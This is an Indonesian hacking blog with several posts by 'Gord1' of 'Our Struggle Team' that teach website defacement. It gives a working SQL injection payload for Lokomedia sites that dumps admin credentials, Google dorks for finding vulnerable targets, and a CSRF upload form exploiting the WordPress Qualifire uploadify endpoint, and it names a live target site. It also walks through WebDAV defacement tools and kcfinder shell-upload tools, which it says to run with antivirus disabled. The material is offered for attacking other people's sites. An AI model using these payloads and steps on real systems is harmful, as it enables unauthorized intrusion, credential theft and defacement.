August 2017

Hy sob gw mau share tool lagi pasti udah pada tau lah :)

Gw mau share vpn for pc 




Menurut gw nihh vpn penting banget dikalangan seperti kita yang suka bermain-main dengan internet karena vpn bisa menjaga identitas/privasi kita dari dunia internet yang luas ini 

Yuk langsung download aja

Link download klik disini

Nb: kalo link rusak atau error harap lapor ya :)

Sekian.



                                                                                                Gord1


Hy apa kabar sob :) kali ini saya akan share tutorial deface teknik lama sih tapi masih work kok tergantung otak vokep kalian :v






Sesuai judul diatas gw mau share deface SQL Lokomedia :)

langsung aja yuk :)

Bahan :


  NB: kembangin lg dork nya :)

- Exploit :
   
   'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

- MD5 Decrypter
  

Tutorialnya :

1. Dorking di google, nah sekarang gw pake dork inurl:/statis-1-profil.html site:org
   gw udah punya target nihh








2. Klik targetnya terus masukan Exploitya dibelakang angka ya misal http://site.co.li/statis-2-profil
    kalo sudah di kasih expolit jadi kayak gini
 Http://site.co.li/statis-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

liat gambar ya :)







    
3. Kalo vuln maka akan terlihat nama admin dan paswordnya dengan cara tekan ctrl+u pada keyboard
Gk semua site vuln coeg deface butuh kesabaran semua tidak ada yg instan !







4. Tinggal kita hash dahh password tersebut, gw has disini 
    https://hashkiller.co.uk/md5-decrypter.aspx





ketemu kan paswordnya :v




5. Tinggal kita cari admin login site nya 
    site.coli/admin
    site.coli/adminweb
    site.coli/redaktur

     atau lu bisa pake Tool Admin Finder udah gw upload di blog ini tinggal lu download yak :v 
   Sekarang gw udah ketemu admin loginya nih






6. Coba gw login ya :)





  Masuk kan  hahah Terserah lu dahh mau lu apain tuhh web tanem shell kek acak-acak kek coli juga bisa :v 
pesan gw kalo mau tebas index backup dulu indexnya kasian ini site indo hargai webmaster, emang jadi webmaster mudah coeg !


Ok sekian dari gw semoga bermanfaat :)


salam saya Gord1


Our Struggle Team


    


Kali ini saya akan share Tutorial Install Sqlmap di Android 
pasti kalian udah pada tahu kan apa itu sqlmap? untuk yg belum tau saya akan jelaskan sedikit

Sqlmap adalah sebuah script eksploitasi yang di tulis dengan bahasa pemrograman python, di mana cara kerja script ini ialah melakukan eksploitasi terhadap website yang memiliki celah terhadap sql injection

Apa  Sql Injection?

Sql Injection adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain.



Ok langsung saja ke tutorialnya!

Bahan    :
-Android 5.0+ (kalau dibawah 5.0 saya kurang tahu)
-Termux (Ada di Play Store)
-Koneksi Internet

Tutorial  :
- Install apk Termux kalau sudah next
- Buka aplikasi Termux yg sudah di download tadi
- Ketik apt-get update (Tunggu sampai proses update selesai , kalau sudah selesai next)
- Install python2.7 dengan ketik  apt-get install python2 (Tunggu proses install selesai, kalau sudah next)

- Ketik lagi apt-get install git (Tunggu sampai proses install selesai, sudah? next)
- Sekarang tinggal install git clone nya, ketik git clone https://github.com/sqlmapproject/sqlmap.git (Tunggu sampai selesai install clone nya , sudah? next)
- Nah kalau tutorial diatas sudah semuanya, tinggal pindah ke directory nya dengan ketik cd sqlmap terus ketik lagi python2 sqlmap.py (Kalau succes akan jadi seperti ini)
Kalau succes akan tampil seperti diatas, mudah bukan?

cara pakainya gimana? use your brain:v (Next tutorial)
sekian dulu tutorial dari saya, tadinya mau upload sama video cuman belum sempet up videonya, jadi yaa gini dah:v .. ok dah saya tutup , smoga bermanfaat:) dan terima gaji:v

Nantikan tutorial-tutorial berikutnya:)

Wad00 lagi :v


Deface teknik webdav bagi kalangan defacer mungkin ini teknik paling rendah ya tapi tak apalah orang gw juga newbie yang lagi belajar :v






Gw mau share  Tool Webdav V.3 Hmei7 dan cara gunainya :)


Pertama download dulu Webdav V.3 Hmi7 nya cuk !
Bisa lu download disini https://ufile.io/in7rk

Terus lu instal jangan lupa matikan antivirus lu dulu karena nanti tool ini akan terbaca sebagai virus tapi tenang aja aman kok :v

Udah terinstal kan bukan file .exe nya

- Yang di kolom Tambah data/Add list lu klik terus pilih file.txt yang di dalemnya sebelumnya lu isi daftar web targetlu
- Kalo dikolom Your Message, To Dear Admin isi pake script deface lu
- Dikolom Name,of ur file isi pake nama script lu bebas dengan format html/htm misal coli.html :v
-Terus klik Hajar !
-Tunggu hingga muncul notifikasi berhasil gak :v

Gampang kan ? :v

Done ya :)

Sekian, salam saya Gord1

Our Struggle Team



Wad00 lagi nihh gw mau share tools deface cuk  ! hampir sama sih kayak webdav, kali ini tool untuk menanam shell backdoor pada web :v
bissmillah dulu biar berhasil :v

Contoh gambar tool nya nih






Link download https://files.fm/u/ucjw8ahg

Cara gunainya ?

-Dikolom target tulis site yg menurut lu vuln taruh dibelakang /path/kcfinder
-Dikolom shell tulis nama shell lu atau gak random aja jangan lupa ekstensinya php/ndxsf
-Klik submit kalo berhasil nanti muncul akses shell lu kalo gagal coba ngaca dulu gihh sono bisa jadi faktor wajah :v

Done ya :v

Sekian

Gord1

Our Struggle Team


Wad00 gua mau share nihh cara mencari admin login suatu web menggunakan Tool Admin Finder







Caranya gampang kok sob :v


Nihh siapkan bahanya :

- Tool Admin Finder, bisa download disini https://ufile.io/2my8q
- Xampp, bisa lu cari di google


Stepya langsung ya :v

1. Download admin finder diatas terus lu simpan di directory (C:/xampp/perl) Atau bisa lihat gambar dibawah ini cuk





2. Buka control panel Xampp, klik start di Apache dan My Sql, terus klik Shell. lihat di gambar cuk !







3. Nah nanti langsung muncul kayak gini !
-Tulis cd perl lalu enter kemudian tulis perl namafileadminfinderlu.pl terus enter lagi cuk !






4. Nanti muncul tampilan admin findernya dahh tinggal tulis web target yang lu mau cari admin loginya ;v





5. kalo gagal mungkin faktor face cuk ! ngaca dulu gihh sana :v Kalo berhasil maka kayak gini nihh






Done ya ;v

Cape cuk gw nulis bayar sini kalo gak kirimin gw pulsa aja ya ;v

Salam saya Gord1

Our Struggle Team



Nehh gw mau share tutorial deface lagi kagak sengaja nemu ini poc :V

#########################
# Exploit Title: JADBM Cms upload shell
# Google Dork : intext:" Powered by JADBM "
# Date:February 22, 2017
# Discovered By: Gord1
# We Are Our Struggle Team

# Home: https://www.facebook.com/groups/326928447746990/?fref=ts
# Version: All Version
# Tested on : Win7
##########################

Wad00 Our Struggle Team

Hahahaha Ketemu ama gua nih Gord1
gw mau bagi tutorial deface yang mungkin udah banyak yang tau :v

Sesuai judul diatas Deface  Wordpress Themes Qualifier :v

Bahan:
Dork:    * inurl:"/wp-content/themes/qualifire"
              * inurl:"/wp-content/themes/qualifire" site:co.li (pake otak bokep lu asw)
              
              Kembangin dork nya ya masa dapet janda terus gk malu ama yg lain -_


Exploit:  /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php


Csrf 
           <form
           action="http://target.co.li/wp-
           content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
           method="post"
           enctype="multipart/form-data">
           <label for="file">Filename:</label>
           <input type="file" name="Filedata" ><br>
           <input type="submit" name="submit" value="Submit">
           </form>
               
             Copast di Notepad simpan dengan ekstensi .html

Tutorialnya :

1. Dorking di google pake dork diatas :)
   



2. Pilih targetnya terus masukan exploitnya sekaligus :)
    Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php




3. Kalo vuln akan blank putih kayak gini cuk !




4. Tinggal kopi link target terus masukin ke csrf dahh simpan pake ekstensi .html






5. upload script kalian klo gw upload script.txt kalo lg hoki sih bisa upload shell ;v




6. kalo berhasil nanti akan muncul angka 1





7. Aksesnya ? site.co.li/namascriptlu.coli

Done :)

Nihh gw kasih live target :http://www.architecte-rivalland.com

Sekian ya 
Salam saya Gord1

Our Struggle Team






Zaenal Arifin

{facebook#https://www.facebook.com/darkvenom.gov} {twitter#https://twitter.com/steviefar07} {google-plus#https://plus.google.com/u/0/117673850650242989379} {youtube#https://www.youtube.com/c/KaizenJavaHaxor}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget